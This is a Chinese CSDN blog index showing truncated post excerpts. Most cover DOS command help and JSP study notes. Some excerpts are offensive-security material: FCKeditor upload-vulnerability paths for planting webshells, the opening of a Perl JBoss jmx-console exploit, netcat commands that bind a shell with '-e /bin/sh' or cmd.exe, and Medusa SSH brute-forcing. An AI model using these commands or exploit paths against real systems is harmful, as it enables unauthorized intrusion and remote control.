blrk-CSDN博客

原创 DOS命令之fc

D:\test>fc /?比较两个文件或两个文件集并显示它们之间的不同FC [/A] [/C] [/L] [/LBn] [/N] [/OFF[LINE]] [/T] [/U] [/W] [/nnnn] [drive1:][path1]filename1 [drive2:][path2]filename2FC /B [drive1:][path1]filename1 [drive2

2013-06-06 15:02:22 1052

原创 DOS命令之ren

D:\test>ren /?重命名文件。RENAME [drive:][path]filename1 filename2.REN [drive:][path]filename1 filename2.请注意，您不能为目标文件指定新的驱动器或路径。D:\test>（1）新文件名前不可以加上盘符和路径，因为该命令只能对同一盘上的文件更换文件名；（2）允许使用通配符更改一组文件名

2013-06-06 11:33:46 2151

原创 DOS命令之type

D:\test>type /?显示文本文件的内容。TYPE [drive:][path]filenameD:\test>（1）显示由ASCII码组成的文本文件，对。EXE.COM等为扩展名的文件，其显示的内容是无法阅读的，没有实际意义2；（2）该命令一次只可以显示一个文件的内容，不能使用通配符；（3）如果文件有扩展名，则必须将扩展名写上；（4）当文件较长，一屏显

2013-06-06 11:32:13 2194

原创 DOS命令之xcopy

D:\test>xcopy /?复制文件和目录树。XCOPY source [destination] [/A | /M] [/D[:date]] [/EXCLUDE:file1[+file2][+file3]...] source 指定要复制的文件。 destination 指定新文件的位置和/或名称。 /A

2013-06-06 11:29:14 1120

原创 DOS命令之copy

2013-06-06 11:09:56 1121

原创 DOS命令之label、vol

D:\test>label /?创建、更改或删除磁盘的卷标。LABEL [drive:][label]LABEL [/MP] [volume] [label] drive: 指定驱动器号。 label 指定卷标。 /MP 指定卷应被视为装入点或卷名。 volume 指定驱动器号(后面跟一个冒号

2013-06-06 09:45:15 1694

原创 DOS命令之chkdsk

D:\test>chkdsk /?检查磁盘并显示状态报告。CHKDSK [volume[[path]filename]]] [/F] [/V] [/R] [/X] [/I] [/C] [/L[:size]] [/B] volume 指定驱动器号(后面跟一个冒号)、装入点或卷名。 filename 仅用于 FAT/FAT32: 指定要检查是否有碎片

2013-06-06 09:08:55 1961

原创 DOS命令之format

D:\test>format /?格式化磁盘以供 Windows 使用。FORMAT volume [/FS:file-system] [/V:label] [/Q] [/A:size] [/C] [/X] [/P:passes][/S:state]FORMAT volume [/V:label] [/Q] [/F:size] [/P:passes]FORMAT volume [/V:

2013-06-05 15:29:55 1324

原创 DOS命令之tree

D:\test>tree /?以图形显示驱动器或路径的文件夹结构。TREE [drive:][path] [/F] [/A] /F 显示每个文件夹中文件的名称。 /A 使用 ASCII 字符，而不使用扩展字符。D:\test>tree卷 DataCenter 的文件夹 PATH 列表卷序列号为 00000200 CCC4:4136D:.├─a└─bD

2013-06-05 15:26:38 922

原创 DOS命令之path

D:\test>path /?为可执行文件显示或设置一个搜索路径。PATH [[drive:]path[;...][;%PATH%]PATH ;键入 PATH ; 清除所有搜索路径设置并指示 cmd.exe 只在当前目录中搜索。键入 PATH 但不加参数，显示当前路径。将 %PATH% 包括在新的路径设置中会将旧路径附加到新设置。D:\test>

2013-06-05 15:25:01 1942

原创 DOS命令之dir

C:\>dir /?显示目录中的文件和子目录列表。DIR [drive:][path][filename] [/A[[:]attributes]] [/B] [/C] [/D] [/L] [/N] [/O[[:]sortorder]] [/P] [/Q] [/R] [/S] [/T[[:]timefield]] [/W] [/X] [/4] [drive:][path][filen

2013-06-05 15:13:02 947 1

原创 DOS命令之rd

功能：删除一个目录D:\>rd /?删除一个目录。RMDIR [/S] [/Q] [drive:]pathRD [/S] [/Q] [drive:]path /S 除目录本身外，还将删除指定目录下的所有子目录和文件。用于删除目录树。 /Q 安静模式，带 /S 删除目录树时不要求确认D:\>D:\>cd /d c:

2013-06-05 15:00:14 1362

原创 DOS命令之cd

功能：显示或改变当前目录C:\>cd /?显示当前目录名或改变当前目录。CHDIR [/D] [drive:][path]CHDIR [..]CD [/D] [drive:][path]CD [..] .. 指定要改成父目录。键入 CD drive: 显示指定驱动器中的当前目录。不带参数只键入 CD，则显示当前驱动器和目录。使用 /D 开关，除了改变驱动器的当前

2013-06-05 14:54:23 984

原创 DOS命令之md

功能：创建目录C:\>md /?创建目录。MKDIR [drive:]pathMD [drive:]path如果命令扩展被启用，MKDIR 会如下改变:如果需要，MKDIR 会在路径中创建中级目录。例如: 假设 \a 不存在，那么: mkdir \a\b\c\d与: mkdir \a chdir \a mkdir b chdir

2013-06-05 14:45:42 1369

原创 DDoS

http://www.ibm.com/developerworks/cn/security/se-ddos/http://qkiller.blog.51cto.com/502686/110478http://www.ixpub.net/blog-14972820-375064.html

2013-05-22 18:06:33 745

原创《JSP开发技术》读书笔记之JavaBean技术

JavaBean规范将“软件组件”的概念引入了Java编程领域，JavaBean是描述Java的软件组件模型，主要目的是为了实现代码的复用。JavaBean本身是一个Java类，与普通的Java类相比稍有不同，它要遵守一些规定：1、实现接口java.io.Serializable；Java的“对象序列化”2、JavaBean类提供一个无参数的构造函数3、JavaBean内的属性都应该

2013-04-12 11:33:24 929

原创《JSP开发技术》读书笔记之内置对象

jsp中隐含定义了9个对象，也叫内置对象。page：代表当前对象；pageContext：页面上下文对象，记录当前页面的相关信息；request：该对象封装了用户提交的信息；response：对客户的请求做出动态的响应，向客户端发送数据；session：会话对象，记录会话范围内的相关信息；application：应用对象，记录应用范围内的相关信息；out：输出流对象，用

2013-04-11 16:35:24 939

原创《JSP开发技术》读书笔记之基本语法

jsp文件的组成部分主要是两类：一类是jsp元素，另一类是html模板。html模板主要是用于静态网页显示；在html模板的基础上增加和动态网页实现有关的jsp元素，来实现网页的动态交互。简单的说，jsp文件就是嵌入java代码的html文件。jsp元素包括以下4种：指令元素：用来提供整个jsp网页信息，如页面使用的字符集、脚本使用的语言等；脚本元素：嵌入java代码，用来实现

2013-04-08 15:02:19 1080

原创《JSP开发技术》读书笔记之JSP运行机制

jsp的执行必须同时具备3个条件：jsp容器、java编译器和java虚拟机。在jsp运行过程中，首先由客户端浏览器发出请求，jsp容器接收请求后，jsp容器对jsp代码进行以下4个操作过程（如果不是首次访问并且jsp文档没有更改过则直接执行第4步）1、代码转化。jsp容器将jsp文件转换成java servlet文件；2、编译。jsp容易编译java servlet文件，生成class

2013-04-03 10:11:06 1086

转载 fckeditor asp 漏洞利用

出现上传漏洞的地址是： http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp打开这个地址就可以上传任何类型的文件了，马儿上传到的位置是: http://www.xxx.co

2013-03-31 01:19:01 1685

转载 fckeditor jsp 漏洞利用

Fckeditor jsp版漏洞利用方法：http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F用这个地址查找上传图片的路径，存在漏洞的话应该返回一个xml文件，如图

2013-03-31 01:05:23 1667

转载 jboss HEAD exp

发一下最近整理的一个小东西吧。JBOSS蠕虫。。。首先发一个exp#!/usr/bin/perl use IO::Socket; print "JBoss Exp...\n"; if(@ARGV!=2){ print "perl $0 \n"; exit; } $ip = $ARGV[0]; $port = $ARGV[1]; $xkcmd = "HEAD /jmx-console/

2013-03-30 18:50:44 1424

原创《渗透测试实践指南》读书笔记之后门和rootkit

瑞士军刀：NetCat监听方：nc -l -p 1234连接方：nc ip 1234传文件：nc -l -p 7777 > calc.exenc ip 7777 < calc.exe打开shell：-e参数nc -l -p 8888 -e /bin/shnc.exe -L -p 8888 -e c:\windows\system32\cmd.exeNetCat的加密版本：

2013-03-30 14:58:01 1220

原创《渗透测试实践指南》读书笔记之漏洞利用

远程密码破解：Medusa，Hydramedusa -h target_ip -U user_list -P pass_dict -M service_to_attack如：medusa -h 192.168.1.10 -u ownedb -P /pentest/passwords/wordlists/darkc0de.lst -M sshMeterpreter shellmigra

2013-03-29 16:52:41 1186

原创《渗透测试实践指南》读书笔记之扫描

批量ping工具：fpingbt中已集成fping -a -g 192.168.1.1 192.168.1.254>hosts.txt；man fping端口扫描：nmapTCP连接扫描：nmap -sT -p- -PN 192.168.1.10，nmap -sT -p- -PN 192.168.1.10-254SYN扫描：nmap -sS -p- -PN 192.16

2013-03-29 09:51:50 1202

原创《渗透测试实践指南》读书笔记之信息搜集

主动侦察：与目标交互，可能会被记录。被动侦察：无交互。HTTrack：网站复制下载地址：www.httrack.com安装：windows傻瓜式；bt下运行“apt-get install webhttrack”仔细浏览目标网站，关注细节。物理地址和位置、电话号码、电子邮箱地址、运营时间、商业关系、员工姓名、与社会媒体的联系，花絮新闻等。关注新闻和公告，可能会发现有用的信息

2013-03-28 18:58:07 1672

转载黑产科普—最近大规模的QQ空间钓鱼攻击

http://www.freebuf.com/articles/web/7951.html

2013-03-25 15:43:05 1793

转载分离Weevely加密模块加密任意WebShell

http://www.freebuf.com/tools/7875.html

2013-03-22 14:08:50 1190

原创网站防盗链的方法

8种防盗链方法：http://www.code-123.com/html/2008814181422580.htmlapache防盗链（Anti-Leech）技术的简单实现：http://www.xiaohui.com/dev/server/20070330-apache-anti-leech.htmapache & nginx 防盗链设置：http://www.cnp

2013-03-11 11:42:04 884

原创 apache .htaccess介绍

.htaccess入门教程：http://www.cnphp.info/htaccess-beginer.html.htaccess rewrite规则详细说明：http://www.cnphp.info/?p=216

2013-03-11 10:21:14 954

原创 windows xp sp2 系统，apache php环境安装过程

1、安装apache 当前windows下的最新版是httpd-2.2.22-win32-x86-no_ssl.msi，可到http://httpd.apache.org/download.cgi下载。安装过程截图参考：http://server.chinabyte.com/13/2475513.shtml 配置文件为：C:\Program Files\Apa

2013-03-06 15:53:01 966

原创 wxPython写的简单md5破解程序

# -*- coding: cp936 -*-import wximport osimport hashlibclass TextFrame(wx.Frame): def __init__(self): wx.Frame.__init__(self, None, -1, 'md5Cracker By blrk', size=(500, 300));

2013-03-01 15:15:33 673

转载 Tomcat后台拿shell （war）

http://huaidan.org/archives/1207.html

2013-02-20 15:10:37 2168

原创 Chrome Extension 开发文档（360极速浏览器应用开放平台）

http://open.chrome.360.cn/extension_dev/overview.html

2013-02-07 14:47:38 1322

原创 Chrome Extension for Securityoverride

manifest.json:{"name": "my first Chrome extension","manifest_version": 2,"version": "1.0","description": "my first Chrome extension, not bad","content_scripts": [{"matches": ["*"],"j

2013-02-07 11:27:33 613

原创菜刀下载链接

http://www.st999.cn/blog/?action=show&id=144http://www.hacknote.com/read/736.html

2013-02-04 16:43:20 1894

原创杂记

0day拼的是特长，渗透拼的是综合能力。要想发现事物的异常情况，最有效的方法就是洞悉事物本身。

2013-01-23 08:55:32 507

原创 web培训

sqlmap, pangolinhttp抓包：Fidderettercap：中间人攻击uptime.netcraft.com：由域名查询ip范围www.exploitdownloads.com

2012-12-14 09:52:00 1067

转载漏洞挖掘

挖掘有几个技术条件：第一，对调试很了解。对软件结构很了解。对所想挖掘的功能要比较了解。第二，要有一点想法或者有一点经验，知道软件在什么情况下可能会出现问题。第三，然后下一步要写一个程序去把这样的问题找出来，而不是自己去找。如果自己去找的话，这样的精力或者时间花费太多，我以前是自己去找，但是效果不是很好。还是要先学会手工找，理解了原理，再用自动化工具，或自己写工具。

2012-11-02 15:58:30 821